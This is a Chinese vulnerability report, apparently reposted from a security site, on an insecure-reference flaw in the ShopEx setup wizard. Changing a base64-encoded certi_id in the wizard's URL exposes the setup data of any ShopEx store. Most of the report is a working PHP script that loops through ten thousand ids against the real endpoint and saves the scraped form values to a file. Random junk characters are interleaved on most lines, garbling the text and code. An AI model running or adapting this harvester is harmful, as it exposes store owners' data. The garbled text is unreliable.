|
|
简要描述:
) A8 `- H; W, c# H/ r2 pShopEx某接口缺陷,可遍历所有网站9 a2 q8 O: i' U' q4 {1 Z, ]8 @
详细说明:
5 v( `2 r$ G. _问题出现在shopex 网店使用向导页面 7 s* T4 {0 z! K; e8 ?2 Z$ f
% R/ `5 N J3 c9 k" P# h& ~
8 N# H3 _3 a& \
6 a$ }! S$ U% v1 w. j0 lhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=+ B/ Z: M6 w# h4 e
+ |1 Z9 X: L2 F" P8 W0 F
7 f; P$ A5 L* G& Z Q* J; [
) U. ^# b4 ~% [7 S
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
) j+ T( M2 L# w6 V4 X4 o
9 f! X) N' i# x; J; Q t0 M3 n, G- a7 u( C
) A1 d. b, {5 @7 G8 Z1 _, Z, N我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 0 U" D% E, B# t' W$ H& E$ u2 o$ `
- g( Z0 j. Z; Z; w! m( Y' e6 E+ i% i: ^( s/ W8 @
. o! q6 z) b. T6 [0 K1 |<?php
! z0 G! ?; j& q
4 N5 R7 n/ F% I0 P: R for ($i=1; $i < 10000; $i++) { //遍历6 w2 E* L9 K% s3 L- b
( L/ r, m# M& I! X. @ }
ShowshopExD($i);
& K' n: g1 z2 f* D4 C9 Q* g9 w" t" X
}
% C! g" b- o9 ?- P# f0 ~# L1 b! ]; ^! B' u/ Z% K( Q
function ShowshopExD($cid) {
7 `3 Z$ u' W0 y
8 Z4 K5 w! Q* U$ e* \ $url='http://guide.ecos.shopex.cn/step2.php';0 H7 K c$ H+ F+ ?
6 M! f( T- E( w! ^# \, y $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');# J! S0 d. q* H. s: @
6 f: B7 j6 w: U( T( w) w $url = $url.'?refer='.$refer;
) \% T$ Y6 u2 C1 E W# I
/ ?3 Z5 m2 J( S% c $ch = curl_init($url);% x U. K/ @- m4 D, A: ?4 M8 |+ r0 ~
2 E3 q8 t0 n b( k8 g* W: _+ l& ^
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
7 N# ?7 G! y$ X" l2 }. U" R0 B7 J2 _# `7 j6 ~5 k
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
% E5 Y' o) y* e9 ^; P, o; u
8 b) y% g. l; h a& w' p/ r $result = curl_exec($ch);
0 W9 _9 r' u9 H$ b) \/ L: F1 g
# r# s/ E7 L, w $result = mb_convert_encoding($result, "gb2312", "UTF-8");
0 h& ^" F& Z9 k: v, \
3 }# J" D; ~$ Q! r* v if(strpos($result,$refer))
& C3 n0 h6 y& [8 C7 _( }) {/ I1 s3 d+ m9 ^
{
9 z* U% H$ ^: n/ _+ a4 E; n+ Y# e; `! g! S3 n0 L: W
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件7 Y% ]5 K5 |8 U% H) e7 H0 V/ [% c
) U8 U' P- e) x ]' }$ I) ^
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
5 w' R" C* e6 y$ t$ B0 `3 u
d0 V) U! A$ [ k4 H' f foreach ($value[1] as $key) {
8 Z$ G) y: N! ]& ^7 f- n
! Q/ k( @8 T2 e! Z4 N* N preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);0 m: S9 R1 I! h2 {
& }4 k& e& |+ q3 Z) f' j; ]; O echo $res[1][0].':'.$res[3][0]."\r\n";
7 S; u! X9 Y, c# F) H( E0 N5 y
* l" n8 R, P5 S, o, e $col =$res[1][0].':'.$res[3][0]."\r\n"; & M' O0 N) u; X) J
4 S$ p: j8 Y. P6 t
fwrite($fp, $col, strlen($col));
1 g, ]# k8 X+ S3 h7 y, b& K3 `5 F8 E4 U6 z( M
}
* a/ j4 w2 e1 U5 Z& U7 ^- A( H6 p% o2 I3 W
echo '--------------------------------'."\r\n";
" m$ k1 K" F1 n" h
' U& Q" H3 V6 T2 ]* ^8 B& R8 ]9 O fclose($fp); : L! @: \' \2 I, W
9 E7 T! u- ^- c% S4 A9 J: l6 H
}6 \; ^% V9 O7 l, Y5 d% a
0 T- c, S# m- q, [; e
flush();# ^( h3 j8 ]( g0 C. t! \
% R1 o R; v) g3 x$ v7 C curl_close($ch);/ X w4 J' h2 [' q) j% h$ i; T
2 F8 x2 E {3 m7 \ i4 C# R }2 n' n/ o( @. t
5 z& [, f- d5 o; w t5 |
?>
* z5 \7 A% b* q" x3 y5 n, S漏洞证明:5 l$ D) [: B7 p
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg; h; k' g$ n* r; I' K! S
refer换成其他加密方式# d' Y/ i2 y+ Q' I; ~
|
|